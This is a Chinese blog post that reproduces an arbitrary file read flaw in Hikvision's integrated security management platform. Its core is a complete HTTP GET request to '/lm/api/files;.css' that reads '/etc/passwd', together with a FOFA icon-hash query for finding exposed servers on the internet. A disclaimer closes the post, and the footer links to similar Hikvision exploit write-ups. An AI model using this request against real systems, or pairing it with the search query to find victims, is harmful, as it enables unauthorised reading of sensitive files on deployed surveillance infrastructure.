02_【复现】海康威视综合安防管理平台任意文件读取

最新推荐文章于 2024-06-07 23:58:30 发布
最新推荐文章于 2024-06-07 23:58:30 发布
阅读量949 收藏 9
点赞数 14
分类专栏: 安全漏洞 文章标签: 安全 web安全 网络安全 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fushuang333/article/details/135291856
版权

目录

一.概述

二.漏洞复现

1. 漏洞一:

2.请求包:

三. 搜索语法:

四.免责声明

一.概述

海康威视综合安防管理平台是一款基于云计算、大数据、人工智能技术构建的智能化综合安防平台。该平台能够对监控视频进行进行全面的数据分析,支持整个安防生命周期的管理,包括布控预案管理、事件管理、报警处理、安全大数据分析等,实现对安防系统的实时监控和智能预警。

二.漏洞复现

1. 漏洞一:

(1)漏洞类型:  任意文件读取

(2)请求类型:GET

(3)复现

首页

响应

2.请求包:

GET /lm/api/files;.css?link=/etc/passwd HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

三. 搜索语法:

1.fofa

icon_hash="-808437027"

四.免责声明

本文所涉及的任何技术、信息或工具,仅供学习和参考之用。请勿利用本文提供的信息从事任何违法活动或不当行为。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。

穿着白衣
关注
  • 14
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
海康威视iVMS-8700综合安防管理平台 文件读取漏洞复现
0xSec
12-13 2074
HIKVISION iVMS 综合安防管理平台download接口处存在任意文件读取漏洞,攻击者通过构造token绕过身份认证,读取服务器中的目录信息与敏感文件。使系统处于极不安全的状态。
漏洞复现】Hikvision流媒体管理服务器后台文件读取漏洞
晚风不及你
01-25 538
Hikvision(海康威视)是一家在中国颇具影响力的安防公司,其网络摄像头产品在市场上占据了相当大的份额。综合安防管理平台基于“统一软件技术架构”理念设计,采用业务组件化技术,满足平台在业务上的弹性扩展。
1day-新接口-海康威视综合安防center存在任意文件读取漏洞
weixin_43167326的博客
05-31 995
海康威视部分综合安防管理平台管理平台基于 " 统一软件技术架构" 理念设计,采用业务组件化技术,满足平台在业务上的弹性扩展。该平台适用于全行业通用综合安防业务,对各系统资源进行了整合和集中管理,实现统一部署、配置、管理和调度,可以对接入的视频监控点集中管理,实现统一部署、统一配置、统一管理和统一调度。
海康威视视频编码设备接入网关存在任意文件读取漏洞
nnn2188185的博客
04-27 769
海康威视是以视频为核心的智能物联网解决方案和大数据服务提供商。 杭州海康威视系统技术有限公司流媒体管理服务器存在任意文件读取漏洞
Hikvision综合安防管理平台files;.css接口存在任意文件读取漏洞 附POC软件
nnn2188185的博客
01-23 811
微信公众号搜索:南风漏洞复现文库 该文章 南风漏洞复现文库 公众号首发综合安防管理平台是一套“集成化”、“智能化”的平台,通过接入视频监控、一卡通、停车场、报警检测等系统的设备。
Hikvision:海康威视海康威视流媒体管理服务器任意文件读取
03-28
海康威视 海康威视海康威视流媒体管理服务器任意文件读取 #USE python3 CNVD-2021-14544.py ip.txt放置在本脚本目录下
漏洞复现】Hikvision综合安防管理平台任意文件读取漏洞
晚风不及你
01-22 1759
Hikvision(海康威视)是一家在中国颇具影响力的安防公司,其网络摄像头产品在市场上占据了相当大的份额。综合安防管理平台基于“统一软件技术架构”理念设计,采用业务组件化技术,满足平台在业务上的弹性扩展。
海康威视综合安防管理平台 files 文件读取漏洞
m0_71285176的博客
01-10 1886
HIKVISION iSecure Center综合安防管理平台是一套“集成化”、“智能化”的平台,通过接入视频监控、一卡通、停车场、报警检测等系统的设备。在其某接口处存在任意文件读取漏洞,攻击者可以读取系统任意敏感文件
海康威视综合安防管理平台部署手册
09-13
海康威视作为全球领先的安防解决方案提供商,其综合安防管理平台是企业级客户进行安全监控、报警管理、视频存储及分析的重要工具。本部署手册旨在为用户详细阐述如何有效地安装、配置以及管理这一系统,确保用户能够...
海康威视iSecure Center综合管理平台产品手册
01-12
海康威视iSecure Center综合管理平台是一款专为安防领域设计的高度集成化和智能化的管理工具,旨在满足全行业的综合安防需求。该平台基于“统一软件技术架构”理念,运用业务组件化技术,确保了平台在业务扩展上的...
iSecure Center综合安防管理平台配置手册 V2.0.0
01-04
海康威视iSecure Center综合安防管理平台配置手册 V2.0.0】是针对该公司的安防管理系统的一份详细指南。iSecure Center是一个一体化、智能化的解决方案,它旨在通过集成视频监控、停车场管理、门禁控制以及报警...
综合安防管理平台 安装部署手册
08-18
综合安防管理平台安装部署手册知识点总结 本手册提供了综合安防管理平台的安装部署指南,旨在引导用户快速完成安装和部署过程。以下是从手册中提炼的关键知识点: 通用约定 1. 图形界面元素引用约定:在手册中,...
海康威视安全接入网关 任意文件读取漏洞复现
m0_61869253的博客
03-03 956
海康威视安全接入网关使用Jquery-1.7.2 , 该版本存在任意文件读取漏洞,可获取服务器内部敏感信息泄露(安博通应用网关也存在此漏洞
漏洞复现海康威视综合安防管理平台 多处 FastJson反序列化RCE漏洞
最新发布
siu~
06-07 823
由于海康威视综合安防管理平台使用了低版本的fastison,不出网无法远程加载恶意类也可通过本地链直接命令执行,从而获取服务器权限。
某购物商城系统commodtiy接口处存在任意文件上传漏洞
weixin_43167326的博客
05-10 764
某购物商城系统commodtiy接口处存在任意文件上传漏洞,恶意攻击者可以上传恶意软件,例如后门、木马或勒索软件,以获取对服务器的远程访问权限或者破坏系统,对服务器造成极大的安全隐患。
海康威视综合安防管理平台 orgManage/v1/orgs/download 任意文件读取漏洞复现
0xSec
05-31 991
海康威视综合安防管理平台 orgManage/v1/orgs/download 接口处存在任意文件读取漏洞,未经身份验证的远程攻击者可利用目录遍历的方式绕过权限认证直接读取后台服务器配置文件等敏感文件,造成信息泄露,使系统处于极不安全的状态。
学“狂飙”的网络安全,做最强盛的打工人!!
Karka_的博客
03-18 131
*刚刚结课,就有学员找到了14K的薪资。**课程虽已结束,但我们的结业帮扶持续进行。束,但我们的结业帮扶持续进行。
漏洞复现海康威视综合安防管理平台 iSecure Center /center/api/files 任意文件上传
siu~
05-17 942
海康威视综合安防管理平台 `iSecure Center /center/api/files` 任意文件上传
海康威视iVMS综合安防系统任意文件上传(0Day)
失心少年
08-11 2114
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!攻击者通过请求/svm/api/external/report接口任意上传文件,导致获取服务器webshell权限,同时可远程进行恶意代码执行。2.链接马径:/portal/ui/login/…
海康威视isecure center 综合安防管理平台任意文件上传漏洞
11-30
海康威视iSecure Center综合安防管理平台曾存在任意文件上传漏洞。该漏洞允许攻击者通过在应用程序中上传恶意文件来执行任意代码或获取系统权限。这种漏洞可能导致非授权访问、信息泄露、拒绝服务攻击等安全风险。 任意文件上传漏洞通常出现在没有适当的身份验证和文件类型验证的应用程序中。攻击者可以通过构造恶意请求,上传包含恶意脚本或恶意软件的文件,从而执行恶意代码或操作系统命令。 为了防止此类漏洞的发生,海康威视应采取以下措施来加强安全性: 1. 进行有效的输入验证和过滤:实施适当的输入验证,对用户输入进行有效检测和过滤,以防止恶意文件或代码的上传。 2. 限制上传文件类型和大小:对文件上传功能进行严格限制,白名单验证只允许上传特定的文件类型,同时限制文件大小。 3. 实施安全审计和监控:监控平台中的文件上传活动,及时发现和阻止恶意行为,同时记录日志以便进行安全审计和调查。 4. 及时更新和修复漏洞:对已知的漏洞进行及时修复和更新,及早应用安全补丁以确保系统的安全性。 5. 提供安全培训和意识教育:向开发人员和系统管理员提供安全培训,提高其对安全漏洞和攻击的认识,增强安全意识。 通过采取上述措施,海康威视iSecure Center综合安防管理平台可以有效地防止任意文件上传漏洞的利用,提高系统的安全性和可靠性。同时,及时修复和更新系统中已知的漏洞,以减少安全风险对系统的威胁。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

穿着白衣

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值